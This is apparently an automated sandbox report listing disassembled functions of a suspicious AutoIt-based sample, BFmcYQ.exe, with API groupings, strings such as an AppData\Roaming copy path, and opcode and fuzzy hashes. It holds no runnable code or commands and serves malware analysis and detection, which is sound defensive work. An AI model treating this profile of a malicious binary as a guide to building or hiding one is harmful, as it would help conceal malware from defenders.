                                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                                          • String ID:
                                                                                          • API String ID: 1352324309-0
                                                                                          • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                          • Instruction ID: 328baf36ccf2a400fc4e67caaa85ad8f466710e6607bf20576959fd6487a11dc
                                                                                          • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                          • Instruction Fuzzy Hash: 2211547671C542C2E720BF25E488369A3A0FB88B88FD44136C68D4BA64EF7CD544CB70
                                                                                          Function 00007FF74D06B778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$abort
                                                                                          • String ID:
                                                                                          • API String ID: 1447195878-0
                                                                                          • Opcode ID: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                                          • Instruction ID: c8c5e511ace911e72a3beb3f58cc107ac248a4792151d782a6f4fcd4f0f6dca0
                                                                                          • Opcode Fuzzy Hash: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                                          • Instruction Fuzzy Hash: 1F0169A4F0D646C2EA58B7B1A55A27C92515F48B90FD41938D99E077F6FE2CE8014220
                                                                                          Function 00007FF74D0A9260 Relevance: 6.0, APIs: 4, Instructions: 37sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                          • String ID:
                                                                                          • API String ID: 2875609808-0
                                                                                          • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                          • Instruction ID: 9966d1e7a898a0d07ccb4eb0d4a9fe86117a9c1d8ca5e990e79e67d03f60f266
                                                                                          • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                          • Instruction Fuzzy Hash: 5D01C410B0CB86C2EA167775A04927EF360AFAA741FC40335E9CB22670EF28E4958720
                                                                                          Function 00007FF74D0E072C Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                          • String ID:
                                                                                          • API String ID: 1539411459-0
                                                                                          • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                          • Instruction ID: 03ffdd2418f82d1dfe0ee481b41095a95274bb4c9ca2cd915dbf8fcad37761c1
                                                                                          • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                          • Instruction Fuzzy Hash: BD019235B1C691C2E704BB15B80D729EB60BB85B94F980574DED903BB1EF7DD4418B10
                                                                                          Function 00007FF74D09D4EC Relevance: 6.0, APIs: 4, Instructions: 24threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3974789173-0
                                                                                          • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                          • Instruction ID: 1bd94480d9c4e16b4b1d3cc841294a3001cd0623c3c6dc2bed4a23eaa80ff7cf
                                                                                          • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                          • Instruction Fuzzy Hash: E4F03061A5D506C2EB507F61E80C76863A0AF59BD5FC84434C94E83664FE7CD999C320
                                                                                          Function 00007FF74D09326E Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                          • Instruction ID: cbace1b3d860c9e140dc8c0f5e12d7b51b4cb085a67c421dd131c2a2485ae096
                                                                                          • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                          • Instruction Fuzzy Hash: D1E01A20A0D716CAFA00BB72A82C338A265AF8DFC1F804831CD4E07B75FE3CA0059710
                                                                                          Function 00007FF74D093287 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                          • Instruction ID: 8e78f8f69ef31cfa4f684bbfd6f8c1069896875206730b3a00a4ae0ea6190602
                                                                                          • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                          • Instruction Fuzzy Hash: F7E01220A0D716CAEA00FB72A82C238A2A4AB8DFC1F800831CD4E03B71EE3DA0059710
                                                                                          Function 00007FF74D06CC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: gfffffff
                                                                                          • API String ID: 3215553584-1523873471
                                                                                          • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                          • Instruction ID: 31438290a1cd01b7352f1f1d1404978699b222e3219da365c83ca42cfc412139
                                                                                          • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                          • Instruction Fuzzy Hash: EE912862B0D78AC6EB21BF6691403B8AFA5AB257D0F448131DBCD073A5EE3DE551C321
                                                                                          Function 00007FF74D0A1D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContainedObject
                                                                                          • String ID: AutoIt3GUI$Container
                                                                                          • API String ID: 3565006973-3941886329
                                                                                          • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                          • Instruction ID: 630d6d723aa4ffba578e6cfa468e1d6ee360db4043069a5b92060a102891b5ef
                                                                                          • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                          • Instruction Fuzzy Hash: 7F913836608B86C5DB24EF2AE4502ADB3A5FB88B84F918036DF8D43764EF79D445C710
                                                                                          Function 00007FF74D06D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: e+000$gfff
                                                                                          • API String ID: 3215553584-3030954782
                                                                                          • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                          • Instruction ID: 0713f7647856f7b2a7666b5a7989dab99e4cef55b830c5267e4915677cc5ba13
                                                                                          • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                          • Instruction Fuzzy Hash: 1E513D62B1C7C2D6E725AF759940369AB91EB91B90F888231C7DC4BBE5EE2CD040C720
                                                                                          Function 00007FF74D06A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                          • String ID: C:\Users\user\AppData\Roaming\BFmcYQ.exe
                                                                                          • API String ID: 3307058713-1120059523
                                                                                          • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                          • Instruction ID: 508a32f9d9c40dab3fb82b672ad23045f882428f431d8e743499473457505a39
                                                                                          • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                          • Instruction Fuzzy Hash: 5F418172B0CA56C9EB14FF61A8400BDA7A5FF44B90B954032ED8E4BB65FE3CE4518720
                                                                                          Function 00007FF74D0D9E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                          • String ID: static
                                                                                          • API String ID: 3467290483-2160076837
                                                                                          • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                          • Instruction ID: 88deef75a177169921721b19178a4546e54e7cf3fae776834681a20431ffc74f
                                                                                          • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                          • Instruction Fuzzy Hash: 24411B3260C6C2C6D670AF25F4547AEB7A1FB85791F504235EBE903AA9EB3CD481CB50
                                                                                          Function 00007FF74D0C5E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                          • String ID: 255.255.255.255
                                                                                          • API String ID: 2496851823-2422070025
                                                                                          • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                          • Instruction ID: 341e01ea82e861e19ce9190e3e4aaf3dd6441e9fa14d1f31db155882a6e02b87
                                                                                          • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                          • Instruction Fuzzy Hash: B431AF36A0C652C1EB18FB26E8582BDA760FB54F94F858531DE9E433A1EF7CD5468310
                                                                                          Function 00007FF74D0C03C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _snwprintf
                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                          • API String ID: 3988819677-2584243854
                                                                                          • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                          • Instruction ID: 20375243a606b236fe7a81ef1bceeab5fb09639a6aa8fa5563d1aff54cf3a0f8
                                                                                          • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                          • Instruction Fuzzy Hash: 9B317B72B0CA02D6EB14FB65E4512ECA361FB44B84F914132DE8D17B69EF78E40AC760
                                                                                          Function 00007FF74D0DB224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateMessageObjectSendStock
                                                                                          • String ID: $SysTabControl32
                                                                                          • API String ID: 2080134422-3143400907
                                                                                          • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                          • Instruction ID: 5e3bac8c5796bd356a2ef32b94bf668f1326d78598830a6861964f1a11dc4381
                                                                                          • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                          • Instruction Fuzzy Hash: 72315A3250C7C1CAE760EF15E44875AB7A0F784BA4F54433AEAA817AE8DB38D4918F50
                                                                                          Function 00007FF74D06DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID: @
                                                                                          • API String ID: 3000768030-2766056989
                                                                                          • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                          • Instruction ID: a391d98c1bd4ef0e6798f129deebc9bee0152a79960e47fdb1e3eef85a7054cc
                                                                                          • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                          • Instruction Fuzzy Hash: 3021CE22F0CA47C1EB60BB25A494138A650EB85774FA81336D6EE073E4EE38D881C270
                                                                                          Function 00007FF74D0DA0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                          • String ID: static
                                                                                          • API String ID: 1983116058-2160076837
                                                                                          • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                          • Instruction ID: d51a009077266ee40461e2ceaf26bee510440972c42c468c7ad6f462922a7c10
                                                                                          • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                          • Instruction Fuzzy Hash: 48313C76A0C781CBD724DF29E44475AB7A1F788750F50423ADB9943BA8DB38E451CF10
                                                                                          Function 00007FF74D0D9868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
